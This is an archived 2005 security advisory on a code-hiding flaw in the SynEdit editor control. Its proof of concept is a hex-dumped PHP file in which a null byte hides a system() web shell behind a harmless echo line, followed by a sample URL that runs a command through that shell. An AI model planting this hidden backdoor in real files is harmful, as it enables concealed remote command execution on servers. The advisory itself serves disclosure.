what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

syn.html

syn.html
Posted Aug 10, 2005
Authored by rgod | Site retrogod.altervista.org

Synedit 2.0.1 has a null byte insertion / code obfuscation flaws.

tags | advisory
SHA-256 | db192550b50828c6a674a11b7ce0d09bcf2711b3bde09aad38aebd14ec305e52

syn.html

Change Mirror Download
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-number">23.47 08/08/2005

Synedit 2.0.1 (possibly prior versions) null byte insertion / code obfuscation


software description:SynEdit is an advanced multi-line edit control,
for Borland Delphi, Kylix (Kylix is supported into latest cvs) and C++Builder.
It supports Syntax Highlighting and code completion,
it does include exporters for html,tex and rtf.

exploit: a user can craft a malicious file using null byte (%00) to obfuscate
code and hide malicious instrunctions to the victim user

poc:

this an exadecimal dump of the file:

3c 3f 70 68 70 20 65 63 68 6f 20 27 68 65 6c 6c < ? p h p e c h o ' h e l l
6f 21 27 3b 00 20 73 79 73 74 65 6d 28 24 48 54 o ! ' ; s y s t e m ( $ H T
54 50 5f 47 45 54 5f 56 41 52 53 5b 63 6f 6d 6d T P _ G E T _ V A R S [ c o m m
61 6e 64 5d 29 3b 20 3f 3e a n d ] ) ; ? >

the file hides a php system shell.
Try to open it in Dev PHP, PHP Designer 2005 or other developing software using
Synedit.

It looks like this:

<?php echo 'hello!';

but when you call this url:

http://[some_host]/[path]/poc.php?command=dir

dir command will be executed...

Tested on:
Microsoft Visual C++ 6.0
Borland Delphi 7.0 Enterprise Edition
PHP Designer 2005 2.2.8
Dev-PHP Version: 2.0.12
Bloodshed Dev-Pascal 1.9.2

on Windows XP Service Pack 2
and so on...


rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta.it
</span></span>
</code></pre>
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close